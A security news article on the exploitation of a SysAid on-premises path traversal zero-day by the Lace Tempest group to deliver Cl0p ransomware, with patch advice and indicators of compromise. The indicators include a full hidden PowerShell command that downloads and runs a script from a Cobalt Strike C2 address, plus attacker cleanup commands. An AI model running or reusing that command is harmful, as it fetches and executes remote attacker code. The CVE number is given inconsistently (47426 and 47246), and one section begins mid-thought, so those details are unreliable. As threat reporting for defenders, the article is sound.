As previously reported, SysAid disclosed a zero-day issue affecting on-premises SysAid servers. The vulnerability was found to be a path traversal vulnerability and was given CVE-2023-47426.
Additionally, SysAid stated that there were reports of Lace Tempest exploiting the vulnerability in the wild.
Moreover, Microsoft Threat Intelligence Team analysis mentioned that the Lace Tempest threat actor has exploited this vulnerability to deploy Cl0p ransomware on affected systems.
This threat actor is the same who exploited MOVEit Transfer applications and GoAnywhere MFT extortion attacks.
Rapid7 Analysis
These were uploaded to the root of SysAid’s Tomcat web service as part of exploitation. It was also reported that the threat actors used three processes, spoolsv.exe, msiexec.exe, and svchost.exe, for exploitation purposes.
However, post-exploitation was done by deploying the MeshAgent remote administration tool and GraceWire malware on the affected devices.
SysAid claims to have 5000 customers and has been proactively communicating with them for mitigation steps. SysAid has also released patches to fix these vulnerabilities.
Document
Protect Your Storage With SafeGuard
Is Your Storage & Backup Systems Fully Protected? – Watch 40-second Tour of SafeGuard
StorageGuard scans, detects, and fixes security misconfigurations and vulnerabilities across hundreds of storage and backup devices.
Mitigation
CVE-2023-47246, which exists in SysAid On-premises servers, can be fixed in version 23.3.36. Customers of SysAid servers are recommended to apply the necessary patches as a priority to prevent threat actors from exploiting the weaknesses on the servers.
Indicators of Compromise
Hashes
Filename Sha256 Comment user.exeb5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4dMalicious loaderMeshagent.exe2035a69bc847dbad3b169cc74eb43fc9e6a0b6e50f0bbad068722943a71a4ccaMeshagent.exe remote admin tool
IP Addresses
IP Comment 81.19.138[.]52GraceWire Loader C245.182.189[.]100GraceWire Loader C2179.60.150[.]34Cobalt Strike C245.155.37[.]105Meshagent remote admin tool (C2)
File Paths
Path Comment C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exeGraceWireC:\Program Files\SysAidServer\tomcat\webapps\usersfiles.warArchive of WebShells and tools used by the attackerC:\Program Files\SysAidServer\tomcat\webapps\leaveUsed as a flag for the attacker scripts during execution
Commands
CobaltStrike
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)
Post-Compromise Cleanup
Remove-Item -Path “$tomcat_dir\webapps\usersfiles\leave”.
Remove-Item -Force “$wapps\usersfiles.war”.
Remove-Item -Force “$wapps\usersfiles\user.*”.
& “$wapps\usersfiles\user.exe”.
Antivirus Detections
Trojan:Win32/TurtleLoader
Backdoor:Win32/Clop
Ransom:Win32/Clop
